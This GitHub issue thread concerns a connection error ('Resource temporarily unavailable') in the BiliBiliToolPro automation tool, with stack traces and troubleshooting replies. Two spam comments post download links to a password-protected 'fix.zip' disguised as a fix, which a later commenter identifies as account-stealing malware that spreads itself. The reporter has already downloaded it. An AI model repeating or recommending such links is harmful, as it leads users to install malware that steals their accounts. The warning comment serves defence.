### ISSUE TITLE
【Bug】执行每日任务时出现Resource temporarily unavailable异常，已持续3天

### ISSUE THREAD

**Issue by BaseenHolmes** [RayWangQvQ/BiliBiliToolPro#777]
### 版本

BiliTool版本号：`x.x.x`

### 确认

- 是的，我已搜索并确认，没有其他相同的议题
- [ ] 是的，我确认，已尝试升级到最新版，但未解决

### 服务器架构

- x64
- [ ] arm64
- [ ] arm
- [ ] 其他（请在下面补充）

### 服务器系统

- [ ] Windows
- [ ] macOS
- [ ] Linux
    - [ ] Debian
    - [ ] Ubuntu
    - [ ] Windows
    - [ ] Alpine
    - Centos
    - [ ] 其他（请在下面补充）

### 选择的BiliTool运行模式

- [ ] docker
- [ ] podman
- [ ] 下载的Release包
- 其他（请在下面补充）
  qinglong面板直接链接拉取导入

### 问题描述

执行任何任务的时候，都报异常：Resource temporarily unavailable

### 日志信息

<details>

```
[09:00:06 INF] ---开始 登录 ---
[09:00:37 ERR] [REQUEST]
GET /x/web-interface/nav HTTP/1.1
Referer: https://www.bilibili.com/
Origin: https://www.bilibili.com
Host: api.bilibili.com
Accept: application/json, text/plain, */*, application/json; q=0.001, application/xml; q=0.001
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Connection: keep-alive

[EXCEPTION]
System.Net.Http.HttpRequestException: Resource temporarily unavailable (api.bilibili.com:443)
 ---> System.Net.Sockets.SocketException (11): Resource temporarily unavailable
   at System.Net.Sockets.Socket.AwaitableSocketAsyncEventArgs.ThrowException(SocketError error, CancellationToken cancellationToken)
   at System.Net.Sockets.Socket.AwaitableSocketAsyncEventArgs.System.Threading.Tasks.Sources.IValueTaskSource.GetResult(Int16 token)
   at System.Net.Sockets.Socket.<ConnectAsync>g__WaitForConnectWithCancellation|277_0(AwaitableSocketAsyncEventArgs saea, ValueTask connectTask, CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.ConnectToTcpHostAsync(String host, Int32 port, HttpRequestMessage initialRequest, Boolean async, CancellationToken cancellationToken)
   --- End of inner exception stack trace ---
   at System.Net.Http.HttpConnectionPool.ConnectToTcpHostAsync(String host, Int32 port, HttpRequestMessage initialRequest, Boolean async, CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.ConnectAsync(HttpRequestMessage request, Boolean async, CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.CreateHttp11ConnectionAsync(HttpRequestMessage request, Boolean async, CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.AddHttp11ConnectionAsync(HttpRequestMessage request)
   at System.Threading.Tasks.TaskCompletionSourceWithCancellation`1.WaitWithCancellationAsync(CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.GetHttp11ConnectionAsync(HttpRequestMessage request, Boolean async, CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.SendWithVersionDetectionAndRetryAsync(HttpRequestMessage request, Boolean async, Boolean doRequestAuth, CancellationToken cancellationToken)
   at System.Net.Http.RedirectHandler.SendAsync(HttpRequestMessage request, Boolean async, CancellationToken cancellationToken)
   at Microsoft.Extensions.Http.Logging.LoggingHttpMessageHandler.SendAsync(HttpRequestMessage request, CancellationToken cancellationToken)
   at Microsoft.Extensions.Http.PolicyHttpMessageHandler.SendCoreAsync(HttpRequestMessage request, Context context, CancellationToken cancellationToken)
   at Polly.Retry.AsyncRetryEngine.ImplementationAsync[TResult](Func`3 action, Context context, CancellationToken cancellationToken, ExceptionPredicates shouldRetryExceptionPredicates, ResultPredicates`1 shouldRetryResultPredicates, Func`5 onRetryAsync, Int32 permittedRetryCount, IEnumerable`1 sleepDurationsEnumerable, Func`4 sleepDurationProvider, Boolean continueOnCapturedContext)
   at Polly.AsyncPolicy`1.ExecuteAsync(Func`3 action, Context context, CancellationToken cancellationToken, Boolean continueOnCapturedContext)
   at Microsoft.Extensions.Http.PolicyHttpMessageHandler.SendAsync(HttpRequestMessage request, CancellationToken cancellationToken)
   at Ray.BiliBiliTool.Agent.HttpClientDelegatingHandlers.IntervalDelegatingHandler.SendAsync(HttpRequestMessage request, CancellationToken cancellationToken) in /ql/data/repo/RayWangQvQ_BiliBiliToolPro/src/Ray.BiliBiliTool.Agent/HttpClientDelegatingHandlers/IntervalDelegatingHandler.cs:line 32
   at Microsoft.Extensions.Http.Logging.LoggingScopeHttpMessageHandler.SendAsync(HttpRequestMessage request, CancellationToken cancellationToken)
   at System.Net.Http.HttpClient.<SendAsync>g__Core|83_0(HttpRequestMessage request, HttpCompletionOption completionOption, CancellationTokenSource cts, Boolean disposeCts, CancellationTokenSource pendingRequestsCts, CancellationToken originalCancellationToken)
   at WebApiClientCore.Implementations.ApiRequestSender.SendCoreAsync(ApiRequestContext context)
   at WebApiClientCore.Implementations.ApiRequestSender.SendAsync(ApiRequestContext context)

[ELAPSED] 00:00:31.1072947
[09:00:37 ERR] 程序发生异常：Resource temporarily unavailable (api.bilibili.com:443)
[09:00:37 INF] -----结束-----
```

</details>

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by BaseenHolmes** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

Thanks, but the link is dead.
![Snipaste_2024-08-26_11-38-22](https://github.com/user-attachments/assets/622c5103-9a7e-4cc9-b2aa-e00f8745ab05)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BaseenHolmes** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

I've downloaded it, how do I use it

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person.

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by 1311502563** [comment]
遇到同样错误, 详细信息如下
[09:10:18 INF] ---开始 浏览追番频道页10秒 ---
[09:10:18 INF] 开始完成任务
[09:10:18 INF] 开始浏览
[09:10:56 ERR] [REQUEST]
POST /pgc/activity/deliver/task/complete HTTP/1.1
Host: api.bilibili.com
Referer: https://big.bilibili.com/mobile/bigPoint/task
Accept: application/json; q=0.001, application/xml; q=0.001
Content-Type: application/x-www-form-urlencoded

position=jp_channel&c_locale=zh_CN&channel=html5_search_baidu&disable_rcmd=0&mobi_app=android&platform=android&s_locale=zh_CN&statistics=%7b%22appId%22%3a1%2c%22platform%22%3a3%2c%22version%22%3a%226.85.0%22%2c%22abtest%22%3a%22%22%7d

[EXCEPTION]
System.Net.Http.HttpRequestException: Resource temporarily unavailable (api.bilibili.com:443)
 ---> System.Net.Sockets.SocketException (11): Resource temporarily unavailable
   at System.Net.Sockets.Socket.AwaitableSocketAsyncEventArgs.ThrowException(SocketError error, CancellationToken cancellationToken)
   at System.Net.Sockets.Socket.AwaitableSocketAsyncEventArgs.System.Threading.Tasks.Sources.IValueTaskSource.GetResult(Int16 token)
   at System.Net.Sockets.Socket.<ConnectAsync>g__WaitForConnectWithCancellation|277_0(AwaitableSocketAsyncEventArgs saea, ValueTask connectTask, CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.ConnectToTcpHostAsync(String host, Int32 port, HttpRequestMessage initialRequest, Boolean async, CancellationToken cancellationToken)
   --- End of inner exception stack trace ---
   at System.Net.Http.HttpConnectionPool.ConnectToTcpHostAsync(String host, Int32 port, HttpRequestMessage initialRequest, Boolean async, CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.ConnectAsync(HttpRequestMessage request, Boolean async, CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.CreateHttp11ConnectionAsync(HttpRequestMessage request, Boolean async, CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.AddHttp11ConnectionAsync(HttpRequestMessage request)
   at System.Threading.Tasks.TaskCompletionSourceWithCancellation`1.WaitWithCancellationAsync(CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.GetHttp11ConnectionAsync(HttpRequestMessage request, Boolean async, CancellationToken cancellationToken)
   at System.Net.Http.HttpConnectionPool.SendWithVersionDetectionAndRetryAsync(HttpRequestMessage request, Boolean async, Boolean doRequestAuth, CancellationToken cancellationToken)
   at System.Net.Http.RedirectHandler.SendAsync(HttpRequestMessage request, Boolean async, CancellationToken cancellationToken)
   at Microsoft.Extensions.Http.Logging.LoggingHttpMessageHandler.SendAsync(HttpRequestMessage request, CancellationToken cancellationToken)
   at Microsoft.Extensions.Http.PolicyHttpMessageHandler.SendCoreAsync(HttpRequestMessage request, Context context, CancellationToken cancellationToken)
   at Polly.Retry.AsyncRetryEngine.ImplementationAsync[TResult](Func`3 action, Context context, CancellationToken cancellationToken, ExceptionPredicates shouldRetryExceptionPredicates, ResultPredicates`1 shouldRetryResultPredicates, Func`5 onRetryAsync, Int32 permittedRetryCount, IEnumerable`1 sleepDurationsEnumerable, Func`4 sleepDurationProvider, Boolean continueOnCapturedContext)
   at Polly.AsyncPolicy`1.ExecuteAsync(Func`3 action, Context context, CancellationToken cancellationToken, Boolean continueOnCapturedContext)
   at Microsoft.Extensions.Http.PolicyHttpMessageHandler.SendAsync(HttpRequestMessage request, CancellationToken cancellationToken)
   at Ray.BiliBiliTool.Agent.HttpClientDelegatingHandlers.IntervalDelegatingHandler.SendAsync(HttpRequestMessage request, CancellationToken cancellationToken) in /ql/data/repo/RayWangQvQ_BiliBiliToolPro/src/Ray.BiliBiliTool.Agent/HttpClientDelegatingHandlers/IntervalDelegatingHandler.cs:line 32
   at Microsoft.Extensions.Http.Logging.LoggingScopeHttpMessageHandler.SendAsync(HttpRequestMessage request, CancellationToken cancellationToken)
   at System.Net.Http.HttpClient.<SendAsync>g__Core|83_0(HttpRequestMessage request, HttpCompletionOption completionOption, CancellationTokenSource cts, Boolean disposeCts, CancellationTokenSource pendingRequestsCts, CancellationToken originalCancellationToken)
   at WebApiClientCore.Implementations.ApiRequestSender.SendCoreAsync(ApiRequestContext context)
   at WebApiClientCore.Implementations.ApiRequestSender.SendAsync(ApiRequestContext context)

[ELAPSED] 00:00:27.0171312
[09:10:56 ERR] 浏览追番频道页10秒失败，继续其他任务。失败信息:Resource temporarily unavailable (api.bilibili.com:443)

**Comment by 1311502563** [comment]
> 遇到同样错误， 详细信息如下 [09：10：18 INF] ---开始 浏览追番频道页10秒 --- [09：10：18 INF] 开始完成任务 [09：10：18 INF] 开始浏览 [09：10：56 ERR] [REQUEST] POST /pgc/activity/deliver/task/complete HTTP/1.1 主机：api.bilibili.com Referer：https://big.bilibili.com/mobile/bigPoint/task Accept：application/json;q=0.001，应用程序/xml;q=0.001 内容类型：application/x-www-form-urlencoded
> 
> 位置=jp_channel&c_locale=zh_CN&channel=html5_search_baidu&disable_rcmd=0&mobi_app=android&platform=android&s_locale=zh_CN&statistics=%7b%22appId%22%3a1%2c%22platform%22%3a3%2c%22version%22%3a%226.85.0%22%2c%22abtest%22%3a%22%22%7d
> 
> [例外] System.Net.Http.HttpRequestException：资源暂时不可用 （api.bilibili.com:443） ---> System.Net.Sockets.SocketException（11）：System.Net.Sockets.Socket.AwaitableSocketAsyncEventArgs.GetResult（Int16 token） at System.Net.Sockets.Socket.g__WaitForConnectWithCancellation|277_0（AwaitableSocketAsyncEventArgs saea， ValueTask connectTask， CancellationToken cancellationToken） at System.Net.Http.HttpConnectionPool.ConnectToTcpHostAsync（String host， Int32 port， HttpRequestMessage initialRequest， Boolean async， CancellationToken cancellationToken） ---内部异常堆栈跟踪---结束在 System.Net.Http.HttpConnectionPool.ConnectToTcpHostAsync（String host， Int32 port， HttpRequestMessage initialRequest， Boolean async， CancellationToken cancellationToken） 在 System.Net.Http.HttpConnectionPool.ConnectAsync（HttpRequestMessage request， Boolean async， CancellationToken cancellationToken） 在 System.Net.Http.Http.HttpConnectionPool.CreateHttp11ConnectionAsync（HttpRequestMessage request， Boolean async， CancellationToken cancellationToken）在 System.Net.Http.Http.HttpConnectionPool.AddHttp11ConnectionAsync（HttpRequestMessage request） 在 System.Threading.Tasks.TaskCompletionSourceWithCancellation3 操作、上下文上下文、CancellationToken cancellationToken、ExceptionPredicates shouldRetryExceptionPredicates、ResultPredicates5 onRetryAsync、Int32 permittedRetryCount、IEnumerable4 sleepDurationProvider、布尔值 continueOnCapturedContext）在 Polly.AsyncPolicy3 操作、上下文上下文、CancellationToken cancellationToken、布尔值 continueOnCapturedContext） Microsoft.Extensions.Http.PolicyHttpMessageHandler.SendAsync（HttpRequestMessage 请求， CancellationToken cancellationToken） 在 Ray.BiliBiliTool.Agent.HttpClientDelegatingHandlers.IntervalDelegatingHandler.SendAsync（HttpRequestMessage 请求， CancellationToken cancellationToken） 在 /ql/data/repo/RayWangQvQ_BiliBiliToolPro/src/Ray.BiliBiliTool.Agent/HttpClientDelegatingHandlers/IntervalDelegatingHandler.cs：第 32 行 Microsoft.Extensions.Http.Logging.LoggingScopeHttpMessageHandler.SendAsync（HttpRequestMessage request， CancellationToken cancellationToken） System.Net.Http.HttpClient.g__Core|83_0（HttpRequestMessage 请求， HttpCompletionOption completionOption， CancellationTokenSource cts， 布尔值 disposeCts， CancellationTokenSourcependingRequestsCts， CancellationToken originalCancellationToken） 在 WebApiClientCore.Implementations.ApiRequestSender.SendCoreAsync（ApiRequestContext context） at WebApiClientCore.Implementations.ApiRequestSender.SendAsync（ApiRequestContext context）`1.WaitWithCancellationAsync(CancellationToken cancellationToken) at System.Net.Http.HttpConnectionPool.GetHttp11ConnectionAsync(HttpRequestMessage request, Boolean async, CancellationToken cancellationToken) at System.Net.Http.HttpConnectionPool.SendWithVersionDetectionAndRetryAsync(HttpRequestMessage request, Boolean async, Boolean doRequestAuth, CancellationToken cancellationToken) at System.Net.Http.RedirectHandler.SendAsync(HttpRequestMessage request, Boolean async, CancellationToken cancellationToken) at Microsoft.Extensions.Http.Logging.LoggingHttpMessageHandler.SendAsync(HttpRequestMessage request, CancellationToken cancellationToken) at Microsoft.Extensions.Http.PolicyHttpMessageHandler.SendCoreAsync(HttpRequestMessage request, Context context, CancellationToken cancellationToken) at Polly.Retry.AsyncRetryEngine.ImplementationAsync[TResult](Func``1 shouldRetryResultPredicates, Func``1 sleepDurationsEnumerable, Func``1.ExecuteAsync(Func`
> 
> [已结束] 00：00：27.0171312 [09：10：56 ERR] 浏览追番频道页10秒失败，继续其他任务。失败信息：Resource temporarily unavailable （api.bilibili.com:443）

是否能增加错误支持
例如, 出现异常后, 等待10秒重试, 最多重试六次, 全部异常则放弃执行

**Comment by RenegadeTuke** [comment]
App任务列表没有这项任务，请注释掉【浏览追番频道页10秒】！
![屏幕截图 2024-09-24 022905](https://github.com/user-attachments/assets/87f34019-87e8-44b9-894e-ac788fa6d2c1)

**Comment by zechenyhy** [comment]
> App任务列表没有这项任务，请注释掉【浏览追番频道页10秒】！


想问一下在本地如何注释掉这个东西，我一般是用visual studio code进行个性化修改，用Windows自带的自动化执行运行，但在visual studio code找不到能修改的部分

**Comment by RayWangQvQ** [comment]
青龙有专门的issue模板，可以看一下，欢迎提供更多信息
